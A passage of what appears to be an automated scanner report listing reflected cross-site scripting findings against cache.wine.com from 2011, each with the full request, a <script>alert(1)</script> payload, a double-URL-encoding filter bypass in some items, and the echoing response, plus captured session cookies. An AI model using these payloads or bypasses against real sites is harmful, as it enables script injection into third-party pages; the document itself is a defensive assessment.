User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:47 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/ratingCG.gif?Lo0P=70095<script>alert(1)</script>d0259add5c3 was not found on this server.<P>
...[SNIP]...

1.27. http://cache.wine.com/images/ratingJH.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/ratingJH.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 32782<script>alert(1)</script>01af30a1f08 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/ratingJH.gif?Lo0P=32782<script>alert(1)</script>01af30a1f08 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/ratingJH.gif?Lo0P=32782<script>alert(1)</script>01af30a1f08 was not found on this server.<P>
...[SNIP]...

1.28. http://cache.wine.com/images/ratingRP.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/ratingRP.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 1b75a<script>alert(1)</script>4e3044403c8 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/ratingRP.gif?Lo0P=1b75a<script>alert(1)</script>4e3044403c8 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:26 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/ratingRP.gif?Lo0P=1b75a<script>alert(1)</script>4e3044403c8 was not found on this server.<P>
...[SNIP]...

1.29. http://cache.wine.com/images/ratingWE.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/ratingWE.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload b2275<script>alert(1)</script>50e0f694b76 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/ratingWE.gif?Lo0P=b2275<script>alert(1)</script>50e0f694b76 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:11 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/ratingWE.gif?Lo0P=b2275<script>alert(1)</script>50e0f694b76 was not found on this server.<P>
...[SNIP]...

1.30. http://cache.wine.com/images/ratingWN.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/ratingWN.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 2a637<script>alert(1)</script>9278ca47b3d was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/ratingWN.gif?Lo0P=2a637<script>alert(1)</script>9278ca47b3d HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:47 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/ratingWN.gif?Lo0P=2a637<script>alert(1)</script>9278ca47b3d was not found on this server.<P>
...[SNIP]...

1.31. http://cache.wine.com/images/ratingWP.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/ratingWP.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 34808<script>alert(1)</script>f6e43fbaae4 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/ratingWP.gif?Lo0P=34808<script>alert(1)</script>f6e43fbaae4 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:48 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/ratingWP.gif?Lo0P=34808<script>alert(1)</script>f6e43fbaae4 was not found on this server.<P>
...[SNIP]...

1.32. http://cache.wine.com/images/tn_img_bg_fade.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/tn_img_bg_fade.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 78970<script>alert(1)</script>df493198473 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/tn_img_bg_fade.gif?Lo0P=78970<script>alert(1)</script>df493198473 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 261
Date: Mon, 14 Feb 2011 17:16:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/tn_img_bg_fade.gif?Lo0P=78970<script>alert(1)</script>df493198473 was not found on this server.<P>
...[SNIP]...

1.33. http://cache.wine.com/images/topnav/imgGlobalHeaderRightBadge.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/topnav/imgGlobalHeaderRightBadge.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload f8c4c<script>alert(1)</script>3c927d37eef was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/topnav/imgGlobalHeaderRightBadge.gif?Lo0P=f8c4c<script>alert(1)</script>3c927d37eef HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 279
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/topnav/imgGlobalHeaderRightBadge.gif?Lo0P=f8c4c<script>alert(1)</script>3c927d37eef was not found on this server.<P>
...[SNIP]...

1.34. http://cache.wine.com/images/topnav/imgGlobalHeaderWineGuyLogo.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/topnav/imgGlobalHeaderWineGuyLogo.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 8d1d5<script>alert(1)</script>96824b428f0 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/topnav/imgGlobalHeaderWineGuyLogo.gif?Lo0P=8d1d5<script>alert(1)</script>96824b428f0 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 280
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/topnav/imgGlobalHeaderWineGuyLogo.gif?Lo0P=8d1d5<script>alert(1)</script>96824b428f0 was not found on this server.<P>
...[SNIP]...

1.35. http://cache.wine.com/includes/css/defaultsixC.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /includes/css/defaultsixC.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12a1d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7682b0218f7 was submitted in the REST URL parameter 1. This input was echoed as 12a1d"><script>alert(1)</script>7682b0218f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes12a1d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7682b0218f7/css/defaultsixC.css?v=634305316255490024 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache.wine.com/?s=error_404
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; ASPSESSIONIDCAADTCTT=FOPHBBLAKOBMIJIECKNIKPBL; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=141878944.2078173882.1297703931.1297703931.1297703931.1; __utmb=141878944; __utmc=141878944; __utmz=141878944.1297703931.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/59|utmcmd=referral; SessionGUID=1e3937c8-a88b-4060-a1bc-35f684a9037c; ASP.NET_SessionId=v3dtb3mmqbubajeqx4v01odl; warehouse=CA; cSource=error_404; SL_UVId=2B1D3888066794EE

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-Strangeloop: Compression
Date: Mon, 14 Feb 2011 17:18:02 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 33460


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://cache.wine.com:80/includes12a1d"><script>alert(1)</script>7682b0218f7/css/defaultsixC.css?v" value="634305316255490024" />
...[SNIP]...

1.36. http://cache.wine.com/includes/css/defaultsixC.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /includes/css/defaultsixC.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d405%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b56cecc278 was submitted in the REST URL parameter 2. This input was echoed as 2d405"><script>alert(1)</script>2b56cecc278 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes/css2d405%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b56cecc278/defaultsixC.css?v=634305316255490024 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache.wine.com/?s=error_404
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; ASPSESSIONIDCAADTCTT=FOPHBBLAKOBMIJIECKNIKPBL; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=141878944.2078173882.1297703931.1297703931.1297703931.1; __utmb=141878944; __utmc=141878944; __utmz=141878944.1297703931.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/59|utmcmd=referral; SessionGUID=1e3937c8-a88b-4060-a1bc-35f684a9037c; ASP.NET_SessionId=v3dtb3mmqbubajeqx4v01odl; warehouse=CA; cSource=error_404; SL_UVId=2B1D3888066794EE

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-Strangeloop: Compression
Date: Mon, 14 Feb 2011 17:18:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 33460


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://cache.wine.com:80/includes/css2d405"><script>alert(1)</script>2b56cecc278/defaultsixC.css?v" value="634305316255490024" />
...[SNIP]...

1.37. http://cache.wine.com/includes/css/defaultsixC.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /includes/css/defaultsixC.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3385%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85be706f6e0 was submitted in the REST URL parameter 3. This input was echoed as d3385"><script>alert(1)</script>85be706f6e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes/css/defaultsixC.cssd3385%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85be706f6e0?v=634305316255490024 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache.wine.com/?s=error_404
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; ASPSESSIONIDCAADTCTT=FOPHBBLAKOBMIJIECKNIKPBL; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=141878944.2078173882.1297703931.1297703931.1297703931.1; __utmb=141878944; __utmc=141878944; __utmz=141878944.1297703931.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/59|utmcmd=referral; SessionGUID=1e3937c8-a88b-4060-a1bc-35f684a9037c; ASP.NET_SessionId=v3dtb3mmqbubajeqx4v01odl; warehouse=CA; cSource=error_404; SL_UVId=2B1D3888066794EE

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-Strangeloop: Compression
Date: Mon, 14 Feb 2011 17:18:04 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: cSource=error%5F404; expires=Mon, 14-Feb-2011 19:18:02 GMT; path=/
Set-Cookie: SessionGUID=1e3937c8%2Da88b%2D4060%2Da1bc%2D35f684a9037c; expires=Tue, 14-Feb-2012 17:18:02 GMT; domain=cache.wine.com; path=/
Content-Length: 33460


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://cache.wine.com:80/includes/css/defaultsixC.cssd3385"><script>alert(1)</script>85be706f6e0?v" value="634305316255490024" />
...[SNIP]...

1.38. http://cache.wine.com/labels/102688m.jpg [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /labels/102688m.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 21799<script>alert(1)</script>c7ad993dd1f was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labels/102688m.jpg?Lo0P=21799<script>alert(1)</script>c7ad993dd1f HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 254
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /labels/102688m.jpg?Lo0P=21799<script>alert(1)</script>c7ad993dd1f was not found on this server.<P>
...[SNIP]...

1.39. http://cache.wine.com/labels/103040m.jpg [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /labels/103040m.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload dfa40<script>alert(1)</script>25200f1dd87 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labels/103040m.jpg?Lo0P=dfa40<script>alert(1)</script>25200f1dd87 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 254
Date: Mon, 14 Feb 2011 17:16:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /labels/103040m.jpg?Lo0P=dfa40<script>alert(1)</script>25200f1dd87 was not found on this server.<P>
...[SNIP]...

1.40. http://cache.wine.com/labels/106551m.jpg [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /labels/106551m.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload d543d<script>alert(1)</script>111e9e0bcf8 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labels/106551m.jpg?Lo0P=d543d<script>alert(1)</script>111e9e0bcf8 HTTP/1.1
